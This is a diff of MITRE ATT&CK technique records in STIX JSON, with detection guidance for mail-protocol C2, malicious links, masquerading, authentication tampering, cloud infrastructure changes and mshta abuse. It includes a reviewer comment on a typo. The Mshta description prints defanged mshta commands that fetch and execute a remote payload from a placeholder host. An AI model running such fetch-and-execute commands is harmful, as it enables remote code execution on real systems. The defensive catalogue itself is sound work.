+ "id": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b",
+ "description": "Adversaries may communicate using application layer protocols associated with electronic map delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
+ "name": "Mail Protocols",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
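Review bot: The `description` of the Mail Protocols object added at the top of this hunk says `application layer protocols associated with electronic map delivery`; the surrounding text (SMTP/S, POP3/S, IMAP) makes clear this should be `electronic mail delivery`. The same string existed on the old side, so the commit only moves it, but as it is upstream ATT&CK text the correction should go to the source of the regeneration rather than be patched locally.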
@@ -15474,22 +16065,6 @@
"source_name": "University of Birmingham C2"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Mail Protocols",
- "description": "Adversaries may communicate using application layer protocols associated with electronic map delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
- "id": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "command-and-control"
- }
- ],
- "modified": "2020-03-26T20:28:00.985Z",
- "created": "2020-03-15T16:21:45.131Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -15539,30 +16114,30 @@
],
"modified": "2020-02-18T18:03:37.481Z",
"created": "2020-02-18T18:03:37.481Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_effective_permissions": [
+ "SYSTEM"
],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Windows User Account Control",
+ "System access controls",
+ "File system access controls"
+ ],
+ "x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as LogonUser and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"Access tokens",
"API monitoring"
],
- "x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as LogonUser and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.",
- "x_mitre_defense_bypassed": [
- "Windows User Account Control",
- "System access controls",
- "File system access controls"
- ],
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_effective_permissions": [
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -15588,24 +16163,40 @@
],
"modified": "2020-03-11T14:55:56.177Z",
"created": "2020-03-11T14:49:36.954Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).",
"x_mitre_data_sources": [
"Anti-virus",
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
+ "created": "2020-03-11T14:43:31.706Z",
+ "modified": "2020-03-11T14:43:31.706Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "execution"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "description": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).",
+ "name": "Malicious Link",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -15613,22 +16204,6 @@
"url": "https://attack.mitre.org/techniques/T1204/001"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Malicious Link",
- "description": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).",
- "id": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "execution"
- }
- ],
- "modified": "2020-03-11T14:43:31.706Z",
- "created": "2020-03-11T14:43:31.706Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -15688,26 +16263,27 @@
"phase_name": "collection"
}
],
- "modified": "2019-07-18T15:36:27.346Z",
+ "modified": "2020-07-14T19:39:44.590Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Justin Warner, ICEBRG"
],
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_detection": "This is a difficult technique to detect because adversary traffic would be masked by normal user traffic. No new processes are created and no additional software touches disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for process injection against browser applications",
"x_mitre_data_sources": [
"Authentication logs",
"Packet capture",
"Process monitoring",
"API monitoring"
],
- "x_mitre_contributors": [
- "Justin Warner, ICEBRG"
+ "x_mitre_detection": "This is a difficult technique to detect because adversary traffic would be masked by normal user traffic. No new processes are created and no additional software touches disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for process injection against browser applications",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
],
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -15747,24 +16323,24 @@
],
"modified": "2020-03-31T13:54:08.535Z",
"created": "2020-02-11T19:07:12.114Z",
- "x_mitre_platforms": [
- "Windows",
- "macOS",
- "Linux"
- ],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project"
],
+ "x_mitre_detection": "Monitor network traffic for anomalies associated with known MiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.",
"x_mitre_data_sources": [
"File monitoring",
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_detection": "Monitor network traffic for anomalies associated with known MiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.",
- "x_mitre_contributors": [
- "Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project"
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS",
+ "Linux"
]
},
{
@@ -15811,29 +16387,30 @@
],
"modified": "2020-03-29T20:21:11.895Z",
"created": "2020-02-10T20:30:07.426Z",
- "x_mitre_platforms": [
- "Windows",
- "Linux"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
],
+ "x_mitre_detection": "Look for changes to tasks and services that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks or services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be taken to create tasks or services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
"x_mitre_data_sources": [
"Windows Registry",
"Process monitoring",
"Process command-line parameters",
"Windows event logs"
],
- "x_mitre_detection": "Look for changes to tasks and services that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks or services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be taken to create tasks or services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux"
+ ]
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
+ "id": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Masquerading",
+ "description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\n\nRenaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -15861,10 +16438,9 @@
"description": "Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019."
}
],
- "description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\n\nRenaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)",
- "name": "Masquerading",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -15872,7 +16448,7 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T20:26:01.837Z",
+ "modified": "2020-07-09T13:54:28.727Z",
"created": "2017-05-31T21:30:38.511Z",
"x_mitre_platforms": [
"Linux",
@@ -15881,7 +16457,7 @@
],
"x_mitre_detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\n\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)\n\nLook for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters\"\\u202E\", \"[U+202E]\", and \"%E2%80%AE\u201d.",
"x_mitre_defense_bypassed": [
- "Whitelisting by file name or path"
+ "Application control by file name or path"
],
"x_mitre_data_sources": [
"Process command-line parameters",
@@ -15894,7 +16470,7 @@
"Nick Carr, FireEye",
"David Lu, Tripwire",
"Felipe Esp\u00f3sito, @Pr0teus",
- "ENDGAME",
+ "Elastic",
"Bartosz Jerzman"
],
"x_mitre_version": "1.3",
@@ -15937,25 +16513,25 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T20:23:00.913Z",
+ "modified": "2020-06-20T22:11:45.970Z",
"created": "2020-02-10T20:43:10.239Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_defense_bypassed": [
+ "Application control by file name or path"
],
+ "x_mitre_detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\n\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"Process command-line parameters",
"Binary file metadata"
],
- "x_mitre_detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\n\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)",
- "x_mitre_defense_bypassed": [
- "Whitelisting by file name or path"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -15985,7 +16561,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Modify Authentication Process",
- "description": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM), responsible for gathering, storing, and validating credentials. \n\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. ",
+ "description": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows or pluggable authentication modules (PAM) on Unix-based systems, responsible for gathering, storing, and validating credentials. \n\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. ",
"id": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -15998,20 +16574,70 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-25T20:59:05.357Z",
+ "modified": "2020-07-13T21:23:01.762Z",
"created": "2020-02-11T19:01:56.887Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference. \n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)\n\nMonitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) \n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
"x_mitre_data_sources": [
+ "File monitoring",
"Authentication logs",
"API monitoring",
"Windows Registry",
"Process monitoring",
"DLL monitoring"
+ ],
+ "x_mitre_detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference. \n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)\n\nMonitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux",
+ "macOS"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1578",
+ "url": "https://attack.mitre.org/techniques/T1578"
+ },
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Modify Cloud Compute Infrastructure",
+ "description": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.\n\nPermissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)",
+ "id": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-06-19T14:46:00.117Z",
+ "created": "2019-08-30T18:03:05.864Z",
+ "x_mitre_detection": "Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time or the mount of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.",
+ "x_mitre_data_sources": [
+ "Stackdriver logs",
+ "GCP audit logs",
+ "Azure activity logs",
+ "AWS CloudTrail logs"
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure"
]
},
{
@@ -16113,11 +16739,18 @@
],
"modified": "2020-03-29T22:52:55.930Z",
"created": "2017-05-31T21:31:23.587Z",
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Bartosz Jerzman",
- "Travis Smith, Tripwire",
- "David Lu, Tripwire"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.\n\nMonitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).",
+ "x_mitre_defense_bypassed": [
+ "Host forensic analysis"
],
"x_mitre_data_sources": [
"Windows Registry",
@@ -16126,19 +16759,12 @@
"Process command-line parameters",
"Windows event logs"
],
- "x_mitre_defense_bypassed": [
- "Host forensic analysis"
+ "x_mitre_contributors": [
+ "Bartosz Jerzman",
+ "Travis Smith, Tripwire",
+ "David Lu, Tripwire"
],
- "x_mitre_detection": "Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.\n\nMonitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).",
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
"id": "attack-pattern--a127c32c-cbb0-4f9d-be07-881a792408ec",
@@ -16197,7 +16823,7 @@
},
{
"id": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade",
- "description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \n\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\n\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)",
+ "description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \n\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\n\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)",
"name": "Mshta",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -16257,34 +16883,43 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-27T21:13:44.990Z",
+ "modified": "2020-06-20T22:35:27.613Z",
"created": "2020-01-23T19:32:49.557Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_defense_bypassed": [
- "Application whitelisting",
- "Digital Certificate Validation"
- ],
- "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.\n\nMonitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process command-line parameters",
- "Process monitoring"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank",
"Ricardo Dias"
],
- "x_mitre_platforms": [
